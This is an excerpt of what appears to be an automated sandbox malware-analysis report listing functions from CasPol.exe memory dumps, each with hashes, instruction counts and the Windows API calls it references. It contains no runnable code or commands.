Instruction Fuzzy Hash: C2E1B530B402099FDB18EBB8D858BAE77E3AF85714F16846AE605DB391DF34DC058B91

Uniqueness

Uniqueness Score: -1.00%

Function 05E90480 Relevance: .4, Instructions: 402COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e18516806eabcae73758853012979138f5a01213d1a6537967d70b4d89a1e420
Instruction ID: d27924f00f9c689daf6e505501b41f6107106f12b8a6747da6891f65a77cd076
Opcode Fuzzy Hash: e18516806eabcae73758853012979138f5a01213d1a6537967d70b4d89a1e420
Instruction Fuzzy Hash: 13F19D31F002159BDB18DFB8C848BADB7B2AFC8314F559665D849EB395DB34EC428B90

Uniqueness

Uniqueness Score: -1.00%

Function 05DF9708 Relevance: .4, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 171e73cfd4479856da85edd77000131d89e3f15093f645bc504b7d4d56d1040d
Instruction ID: 8edbd057bdaab96920860ee4286827af1b4e1bfa65764876e9941a990ad8abbf
Opcode Fuzzy Hash: 171e73cfd4479856da85edd77000131d89e3f15093f645bc504b7d4d56d1040d
Instruction Fuzzy Hash: 02D1C030F002189FD728EB78C85976E76E3AFC4714F158479E61AAB380DF749D428B91

Uniqueness

Uniqueness Score: -1.00%

Function 05E92170 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27c9e8fb4d729d8e8188c90a3d0b6732ec2a592a563bae3e63e1da08d458f4e6
Instruction ID: 0efb886b1179da9a8d020614c1de7a77edd031adb04b48d6870f5a0ced8a09e6
Opcode Fuzzy Hash: 27c9e8fb4d729d8e8188c90a3d0b6732ec2a592a563bae3e63e1da08d458f4e6
Instruction Fuzzy Hash: E1C1C474F041186FEF28DBA8C494BBE77A7FB89318F105865E645DB381CA38DC818792

Uniqueness

Uniqueness Score: -1.00%

Function 05EED3A0 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14777ea7b4456b2dba84af3b49e2ee7eb72c18ddb0b4972f6c34c1cbee730a23
Instruction ID: 160a55cb1b9f66caa18fe4c7650e82291c918ff0f6bd978072622a230e5bb67d
Opcode Fuzzy Hash: 14777ea7b4456b2dba84af3b49e2ee7eb72c18ddb0b4972f6c34c1cbee730a23
Instruction Fuzzy Hash: B712C3F1DD17468BE318CF65E9882C93BB1B7C43A8BD04A09D2612BAD4D7B8116ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 023FFC48 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a6854f0e4f1de6132bea8b8937a77ebdc972a7b434ab5a1c00d5fc48f18e0c5
Instruction ID: ea53c96cacdfce09e5c1fab9637da178ae34d695410ba24d88135e2273f80a86
Opcode Fuzzy Hash: 6a6854f0e4f1de6132bea8b8937a77ebdc972a7b434ab5a1c00d5fc48f18e0c5
Instruction Fuzzy Hash: 4F918D71E002098FDF50CFA8D9847DEBBF2AF88718F148129E919E7694EB749845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05EEC054 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 859a6521edcccdfcdc9092bd0a89748b035ef385d7340ef6ae390922003a54a9
Instruction ID: a5e8dc8613e02ab7637eb226597a7527af60e0719d08b97d55bdc5d94f9bdc4a
Opcode Fuzzy Hash: 859a6521edcccdfcdc9092bd0a89748b035ef385d7340ef6ae390922003a54a9
Instruction Fuzzy Hash: 2D917D34E10319CFDB04DBA0D854ADDBBBAFF89314F149225E416AB3A0EB74A949CF50

Uniqueness

Uniqueness Score: -1.00%

Function 023F0878 Relevance: 1.8, APIs: 1, Instructions: 273
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 023F042C: Sleep.KERNEL32(00000000), ref: 023F0BDF

VirtualAllocExNuma.KERNEL32(00000000,00000000,?,?,?,?), ref: 023F0B36

Memory Dump Source

Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd

Similarity

API ID: AllocNumaSleepVirtual
String ID:
API String ID: 1104050493-0
Opcode ID: 654d05d2a0a7127b07424d55504df324f4b668d43e2e2dec517e18d020dd2a13
Instruction ID: 0093d1b4d81ec204d787350421200dd110e12261f1be0c2f8b9aeb5a4c085398
Opcode Fuzzy Hash: 654d05d2a0a7127b07424d55504df324f4b668d43e2e2dec517e18d020dd2a13
Instruction Fuzzy Hash: 1881B270E002488FDF64CFADE8847AEBBB0EB49314F20446AD649E7396D7359C55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05DF7B41 Relevance: 1.7, APIs: 1, Instructions: 206
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05DF7C51

Memory Dump Source

Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de39c7dbd9f8981b945b7e5eb3928fbae6c878d70be44550d111eaaba6ef0bbe
Instruction ID: 6d132a33babd6bbe738beb48c203f63e99be754dc6e3d9bfa5cb68190054698b
Opcode Fuzzy Hash: de39c7dbd9f8981b945b7e5eb3928fbae6c878d70be44550d111eaaba6ef0bbe
Instruction Fuzzy Hash: 1771E230B043059FDB05EB74D844BEA7BB6EF86304F1589AAE545DB392EB34D809CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05EE7440 Relevance: 1.7, APIs: 1, Instructions: 180
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05EE7481

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 59de705b3c0ebec14539f1d24d07974a11b83d18585e8870296fc7a05c84c65d
Instruction ID: 40cfae72e78088411b7bf53318070d52a3e27803e1b0e8483d45c513180f1d51
Opcode Fuzzy Hash: 59de705b3c0ebec14539f1d24d07974a11b83d18585e8870296fc7a05c84c65d
Instruction Fuzzy Hash: FA614E70A102599BDB14EFB8D4587AEB7F2FF85348F108929D446A7390DF349945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05DF7E50 Relevance: 1.7, APIs: 1, Instructions: 177
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 05DFE80C

Memory Dump Source

Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: d1e198c212eb5d9146823238a8bdecc9eb9373e0ec1b9fbf8f7f29509941d989
Instruction ID: 6dd7b9f96b265b29477dee7ec0c5bb14ed7b729a321c6a19ddbcc417fe479fe4
Opcode Fuzzy Hash: d1e198c212eb5d9146823238a8bdecc9eb9373e0ec1b9fbf8f7f29509941d989
Instruction Fuzzy Hash: 1061D3B18093898FD702DF68C4946CEBFB1FF06318F1A819BD5849B253D735890ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 05DF7FD0 Relevance: 1.6, APIs: 1, Instructions: 128
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 05DFE80C

Memory Dump Source

Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 250a766990cdb6ac5b0770189305c4b4a3bbce67d5b81faf5e404fd1b0b7b936
Instruction ID: 6a23dd4f2cf287e41971832a6147c69bdd35489cc7ae22ae4328f1d90fba7d37
Opcode Fuzzy Hash: 250a766990cdb6ac5b0770189305c4b4a3bbce67d5b81faf5e404fd1b0b7b936
Instruction Fuzzy Hash: 615178B18483898FDB00CFA8C484ACEFFF5FF49318F1A81AAD504AB252D3759945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05DFE6F9 Relevance: 1.6, APIs: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb82087eb386368d92c62906e404cf188d970ea677434668358538ae2995ba5b
Instruction ID: 9934718d8442075aa7e1380585a32658e8541213135df07b8147ed7ebba055fb
Opcode Fuzzy Hash: bb82087eb386368d92c62906e404cf188d970ea677434668358538ae2995ba5b
Instruction Fuzzy Hash: 064169B4904348DFDB10CF99C444A9EBBF6FF89304F1A806AE508AB361D7759845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05EEC004 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05EEDEA2

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: edae0c38e9cbb1905447e2e9579acfc9d2eedb92973bb4f00c4b616849c120ed
Instruction ID: a11ad229df8414e7588690ba14cf339102133e71bab50a549f2a326783eb32e3
Opcode Fuzzy Hash: edae0c38e9cbb1905447e2e9579acfc9d2eedb92973bb4f00c4b616849c120ed
Instruction Fuzzy Hash: 7051C0B1D143499FDB14CF99C984ADEFBB5BF48314F24852EE819AB210D774A885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05EEDD86 Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05EEDEA2

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5e57c11494b35118c1586d942b02f89041fa040660c5a9f5ba31d4f1bf103b8a
Instruction ID: 7af4fb0e6579099ffab21031e02e5899bbc3bca480a54959f68504367dc74dec
Opcode Fuzzy Hash: 5e57c11494b35118c1586d942b02f89041fa040660c5a9f5ba31d4f1bf103b8a
Instruction Fuzzy Hash: 9451D2B1D103499FDB14CF99C984ADEFBB5BF48314F24862AE819AB250D774A885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05DFE9B0 Relevance: 1.6, APIs: 1, Instructions: 111
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 05DFEAC9

Memory Dump Source

Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 41fe2819b31998cb7ab02c4d4f36f6daec2ce2053917b7f9f0eb9fbd8c52ba76
Instruction ID: c2abc670cbc531da94ca15991fca8839b490b77b17ec05d9c074f27d7b268d9e
Opcode Fuzzy Hash: 41fe2819b31998cb7ab02c4d4f36f6daec2ce2053917b7f9f0eb9fbd8c52ba76
Instruction Fuzzy Hash: 864113B1E04298DFCB10CFA9C584ADEBBB5BF48314F15846AE959AB360D7749805CF60

Uniqueness

Uniqueness Score: -1.00%

Function 023FD4AD Relevance: 1.6, APIs: 1, Instructions: 90
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 023FD582

Memory Dump Source

Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9619c7dfb36c92c3728d85b8590e93d89684f2f421e64c2e2ced83785c7f5cd3
Instruction ID: b8cc8553b6fa88feb017472875c219488ce60841f640072f869eaeaa881b2fff
Opcode Fuzzy Hash: 9619c7dfb36c92c3728d85b8590e93d89684f2f421e64c2e2ced83785c7f5cd3
Instruction Fuzzy Hash: FB3127B0D0035D8FDB54CFA9E4897DEBBF1AB09318F148129E819A7340D7749446CF91

Uniqueness

Uniqueness Score: -1.00%

Function 023FA9A0 Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 023FD582

Memory Dump Source

Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1b9328949d2c09490c96628aa0938520b9d17e200038acd544806fb80dbb73f3
Instruction ID: 9ade943084788f8852ab4fe92b352f8b75f90925ea94cc49aadb0a289af01242
Opcode Fuzzy Hash: 1b9328949d2c09490c96628aa0938520b9d17e200038acd544806fb80dbb73f3
Instruction Fuzzy Hash: 863135B0D0424D8FDB54CFA9E98979EBBF1FB48318F148529E819AB380D7749485CF92

Uniqueness

Uniqueness Score: -1.00%

Function 05DF7FE8 Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 05DFEAC9

Memory Dump Source

Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 00a4b7fd726273e21a6195b7e2db5d9fa81e6bd6c50fa065e8a48faac9eef8ab
Instruction ID: 0ef6b6431cae0560e3c33238e6f19add002f26ff9412a1871c6c22085ba8cf49
Opcode Fuzzy Hash: 00a4b7fd726273e21a6195b7e2db5d9fa81e6bd6c50fa065e8a48faac9eef8ab
Instruction Fuzzy Hash: AD31D0B1D042589FCB20CF99C984A9EFBF5FF48714F15842AE919AB310D774A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 05DF7FDC Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 05DFE80C

Memory Dump Source

Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 77087d6b50f606dcbbc22051cfa6c3f4c5dfd18b9c11d8d2e338e2f1dd7912ab
Instruction ID: 7bf107f7c4ff9e9546b3033c2600f67c2942ce6c0e545451b0ababaa7a5dc209
Opcode Fuzzy Hash: 77087d6b50f606dcbbc22051cfa6c3f4c5dfd18b9c11d8d2e338e2f1dd7912ab
Instruction Fuzzy Hash: 813112B0D043498FDB10CF99C588A8EFBF5FF48314F29856AE909AB350C7759885CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05EEAEDC Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05EEAE92), ref: 05EEAF7F

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: bf8c8f2bb390722249a659f84af35ecbc12f4e732e67a1b8bc9b4037034dfed8
Instruction ID: a93a69903410f3a52c022583aff3a647abb2d4febc6c4b20a5070a0575faf6ef
Opcode Fuzzy Hash: bf8c8f2bb390722249a659f84af35ecbc12f4e732e67a1b8bc9b4037034dfed8
Instruction Fuzzy Hash: 2521BBB1D043598FCB10CFA9D4487EEFBB0BF48224F05856AD968A7250D7389985CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 05EEF1FC Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05EEF82E,?,?,?,?,?), ref: 05EEF8EF

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5f59c9216668d5a37fd3b860ac21afa4f5a13ddcb17a2c93aa9a6aa43d5c4cd4
Instruction ID: 424972fced8a4a69b91311d36e0022ba5e20da9631ed2e822bdeb57dc3e9b1cd
Opcode Fuzzy Hash: 5f59c9216668d5a37fd3b860ac21afa4f5a13ddcb17a2c93aa9a6aa43d5c4cd4
Instruction Fuzzy Hash: 8821E3B5900349AFDB10CF99D584ADEBBF8FB48324F14846AE958A7310D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 023F0AB3 Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAllocExNuma.KERNEL32(00000000,00000000,?,?,?,?), ref: 023F0B36

Memory Dump Source

Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: f2441f7816c7444ed457f09e1741072b14d190e7acd109480a380db2abc21d27
Instruction ID: 59c5859d1a6e7418ed27bcd68cfe966e45a494b845f29bd69993fb28ce4a8317
Opcode Fuzzy Hash: f2441f7816c7444ed457f09e1741072b14d190e7acd109480a380db2abc21d27
Instruction Fuzzy Hash: 2C2167B18002899FCB10CFA9D884BDFBFF4EF88324F24845AE559A7211C3799945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 023F58AF Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 023F593A

Memory Dump Source

Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 9443eeb1c00dc188674edc833780f3eecbca67264fcaee2d998da6e6ff0fc8d0
Instruction ID: 1731307176b47c050a33176752bf75c2f6764cd19fdf25ff642af903c154f9e3
Opcode Fuzzy Hash: 9443eeb1c00dc188674edc833780f3eecbca67264fcaee2d998da6e6ff0fc8d0
Instruction Fuzzy Hash: 5F21D1B28003498FDB50DFA9E8487DFBBF4FB08324F60816AD948A7691D3385545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 023F0554 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocExNuma.KERNEL32(00000000,00000000,?,?,?,?), ref: 023F0B36

Memory Dump Source

Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: 0ad955547107b78997c3098fbee53488f01bc1d903b93a49c5158ccfd7a3da8d
Instruction ID: 8536afe394db94f85d0155002d38f880da2a85f54bc8f23a28c4e4d596ac64b8
Opcode Fuzzy Hash: 0ad955547107b78997c3098fbee53488f01bc1d903b93a49c5158ccfd7a3da8d
Instruction Fuzzy Hash: 1E1153B59003499FCB50CF9AD888BDFBBF4FB48324F148429E658A7251D375A940CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05EEAF10 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05EEAE92), ref: 05EEAF7F

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 6e8124e7a26c566ab01dc9627aecc9f1a24469385813566344113c32977ce32b
Instruction ID: 946d75433fba4a8d738a0498b641e88a0ea4820672fdb1f43c554ffe1fea42d9
Opcode Fuzzy Hash: 6e8124e7a26c566ab01dc9627aecc9f1a24469385813566344113c32977ce32b
Instruction Fuzzy Hash: B71103B1C046699FCB10CF9AD4447DEFBB4AF48324F15826AD868B7280D378A945CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 05EE8AC0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05EEAE92), ref: 05EEAF7F

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: e3ce0e391afbba16525a405e81daa36665e91f3a4ef2a13eba060ec1eef4a6b7
Instruction ID: 4eb2266268d0fa865d913983ac85ccaaa2eef4d2a60cbdc633c476d4f9ba3325
Opcode Fuzzy Hash: e3ce0e391afbba16525a405e81daa36665e91f3a4ef2a13eba060ec1eef4a6b7
Instruction Fuzzy Hash: B51100B1C046699BDB10CF9AC548BDEFBB4AB48224F15816AE858B7240D378A945CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 023F58C0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 023F593A

Memory Dump Source

Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: eea65e969f76755610f2200ff43eecd4cd1870f98c6a6cc30c9234c5558d16db
Instruction ID: 205d7707f46167dfd7669199264acbbbedbf4f602032bd40e0c6f79c6bcaf0a6
Opcode Fuzzy Hash: eea65e969f76755610f2200ff43eecd4cd1870f98c6a6cc30c9234c5558d16db
Instruction Fuzzy Hash: 2211BEB190034A8FDB50DFA9E4487DFBBF4FB48324FA4842AD948A7640C7396944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05EECD8C Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 05EECE16

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 34bef7c80b5f4e831a639a2a5d6b5b219001508101a76d9195cd9768796e03bb
Instruction ID: 607cf8c7203b68ec7530207cd13cc216523fa33e0e8129ac5860e5b565108a13
Opcode Fuzzy Hash: 34bef7c80b5f4e831a639a2a5d6b5b219001508101a76d9195cd9768796e03bb
Instruction Fuzzy Hash: 8A219FB1C083858FDB15CFA9C4443CEFFB0BF49214F15849AC4A8AB651C3746506CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 05EEBF2C Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 05EECE16

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f54d66cb158d931b723b178a141ddb9904e489b77f2f69f87ca25064eeaf92ef
Instruction ID: 34dec901857e709b91011f3e6d834baf31d6ed19f83faefe1f3849a1a8005d95
Opcode Fuzzy Hash: f54d66cb158d931b723b178a141ddb9904e489b77f2f69f87ca25064eeaf92ef
Instruction Fuzzy Hash: A01120B2C003498BDB20CF9AC444BDEFBF4EB88224F10846AD869B7210D374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05EECDAA Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 05EECE16

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ebae2137ee41e9062a7278d385ae119e9dad5f35dfb4bcab9be35f21265937e4
Instruction ID: 063176d8aac3378edd2036e9155b30c4dbac292e0791a6c3616a4d81c1ee75df
Opcode Fuzzy Hash: ebae2137ee41e9062a7278d385ae119e9dad5f35dfb4bcab9be35f21265937e4
Instruction Fuzzy Hash: F211F0B6C003498BDB20CF9AD444BDEFBF4AB88224F14855AD469A7650D374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05E9151F Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

P@?k, xrefs: 05E9159B

Memory Dump Source

Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd

Similarity

API ID:
String ID: P@?k
API String ID: 0-409849746
Opcode ID: cdc58e5cb0c09b6c1c8b19482df79c59816f57ccc82710997d01231c66dcf428
